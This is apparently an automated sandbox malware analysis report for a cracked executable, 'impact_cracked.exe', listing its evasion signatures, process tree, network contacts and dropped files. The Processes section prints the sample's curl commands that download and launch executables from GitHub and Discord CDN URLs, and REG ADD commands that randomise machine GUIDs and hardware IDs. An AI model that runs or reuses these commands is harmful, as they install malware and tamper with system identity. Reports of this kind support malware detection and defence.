Malware Analysis Report

2025-08-05 21:24

Sample ID 231222-ajhb9aeeal
Target impact_cracked.exe
SHA256 20ffe6d5ffeefecc28bef795ba84e3bb8339522e103c32705b0360f24051b12c
Tags
vmprotect evasion themida trojan
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

20ffe6d5ffeefecc28bef795ba84e3bb8339522e103c32705b0360f24051b12c

Threat Level: Likely malicious

The file impact_cracked.exe was found to be: Likely malicious.

Malicious Activity Summary

vmprotect evasion themida trojan

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Checks BIOS information in registry

VMProtect packed file

Themida packer

Executes dropped EXE

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-22 00:14

Signatures

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-22 00:14

Reported

2023-12-22 00:16

Platform

win10v2004-20231215-en

Max time kernel

74s

Max time network

80s

Command Line

"C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Windows\IME\AppleCleaner.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\IME\AppleCleaner.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\IME\AppleCleaner.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\IME\AppleCleaner.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\IME\AppleCleaner.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\IME\AppleCleaner.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\GameBarPresenceWriter\Solution.exe C:\Windows\system32\curl.exe N/A
File created C:\Windows\GameBarPresenceWriter\Solution64.sys C:\Windows\system32\curl.exe N/A
File created C:\Windows\GameBarPresenceWriter\Disk1.exe C:\Windows\system32\curl.exe N/A
File created C:\Windows\GameBarPresenceWriter\Disk2.exe C:\Windows\system32\curl.exe N/A
File created C:\Windows\GameBarPresenceWriter\Mac.bat C:\Windows\system32\curl.exe N/A
File created C:\Windows\IME\AppleCleaner.exe C:\Windows\system32\curl.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4948 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 928 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 928 wrote to memory of 3264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 928 wrote to memory of 3264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 928 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 928 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4948 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4984 wrote to memory of 640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4984 wrote to memory of 640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4948 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\IME\AppleCleaner.exe
PID 1244 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\IME\AppleCleaner.exe
PID 4948 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 1944 wrote to memory of 1032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1944 wrote to memory of 1032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4948 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4500 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4500 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4948 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 1800 wrote to memory of 1020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1800 wrote to memory of 1020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4948 wrote to memory of 920 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 920 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 920 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 920 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4948 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 1444 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1444 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4948 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 2992 wrote to memory of 3792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2992 wrote to memory of 3792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4948 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 812 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 812 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4948 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4384 wrote to memory of 1332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4384 wrote to memory of 1332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4948 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1688 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4948 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 2924 wrote to memory of 4060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2924 wrote to memory of 4060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4948 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 3640 wrote to memory of 2856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3640 wrote to memory of 2856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe

"C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/0vowp/s/main/1251766222259237725371applecleaner_2.exeaner_2.exe --output C:\Windows\IME\AppleCleaner.exe >nul 2>&1

C:\Windows\system32\curl.exe

curl https://raw.githubusercontent.com/0vowp/s/main/1251766222259237725371applecleaner_2.exeaner_2.exe --output C:\Windows\IME\AppleCleaner.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start C:\Windows\IME\AppleCleaner.exe

C:\Windows\IME\AppleCleaner.exe

C:\Windows\IME\AppleCleaner.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del C:\Windows\IME\AppleCleaner.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500820504596/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe >nul

C:\Windows\system32\curl.exe

curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500820504596/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501239947345/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys >nul

C:\Windows\system32\curl.exe

curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501239947345/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501659365396/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe >nul

C:\Windows\system32\curl.exe

curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501659365396/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500023586896/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe >nul

C:\Windows\system32\curl.exe

curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500023586896/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500342362132/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat >nul

C:\Windows\system32\curl.exe

curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500342362132/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul

C:\Windows\system32\reg.exe

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 6131 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul

C:\Windows\system32\reg.exe

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 6131 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul

C:\Windows\system32\reg.exe

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {613121375-3155415346-1546629722} /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f

C:\Windows\system32\reg.exe

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 613432124-166506641-25780881 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul

C:\Windows\system32\reg.exe

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {613432124-166506641-25780881} /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul

C:\Windows\system32\reg.exe

REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {613432124-166506641-25780881} /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f

C:\Windows\system32\reg.exe

REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 613432124-166506641-25780881 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f

C:\Windows\system32\reg.exe

REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 613432124-166506641-25780881 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f

C:\Windows\system32\reg.exe

REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 613710104-174630705-33274807 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul

C:\Windows\system32\reg.exe

REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 613710104-174630705-33274807 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul

Network

Country Destination Domain Proto
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 146.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 keyauth.win udp
US 104.26.0.5:443 keyauth.win tcp
US 8.8.8.8:53 x2.c.lencr.org udp
US 2.19.169.32:80 x2.c.lencr.org tcp
US 8.8.8.8:53 5.0.26.104.in-addr.arpa udp
N/A 127.0.0.1:51269 tcp
N/A 127.0.0.1:51271 tcp
US 104.26.0.5:443 keyauth.win tcp
N/A 127.0.0.1:51282 tcp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
N/A 127.0.0.1:51284 tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
N/A 127.0.0.1:51298 tcp
N/A 127.0.0.1:51300 tcp
US 104.26.0.5:443 keyauth.win tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp

Files

memory/4948-0-0x00007FF7370D0000-0x00007FF737BD0000-memory.dmp

memory/4948-1-0x00007FFC05E10000-0x00007FFC05E12000-memory.dmp

memory/4948-2-0x00007FF7370D0000-0x00007FF737BD0000-memory.dmp

memory/4948-6-0x00007FF7370D0000-0x00007FF737BD0000-memory.dmp

C:\Windows\IME\AppleCleaner.exe

MD5 f96eb2236970fb3ea97101b923af4228
SHA1 e0eed80f1054acbf5389a7b8860a4503dd3e184a
SHA256 46fe5192387d3f897a134d29c069ebf39c72094c892134d2f0e77b12b11a6172
SHA512 2fd2d28c5f571d40b43a4dd7a22d367ba42420c29627f21ca0a2052070ffb9f689d80dad638238189eed26ed19af626f47e70f1207e10007041c620dac323cc7

memory/3192-10-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp

C:\Windows\IME\AppleCleaner.exe

MD5 4639664afed57a9e2ebb0373a715f159
SHA1 a7c166c3eac948aed501aac067214001df4e09b6
SHA256 af9e98021b05a245873ccf8bc952f89a2a856ad70323ab2d5a6687bdf811fbd3
SHA512 5b042a548cb1441b7e5fb2d526db386f0d842d998a8ff5685c9516db5402ad2d1dd7317be22e9c62349d46f961382cbc64db59564f54fe045f507791efea8ff9

memory/3192-12-0x00007FFC05C10000-0x00007FFC05E05000-memory.dmp

memory/3192-13-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp

memory/3192-14-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp

memory/3192-15-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp

memory/3192-16-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp

memory/3192-18-0x00007FFC05C10000-0x00007FFC05E05000-memory.dmp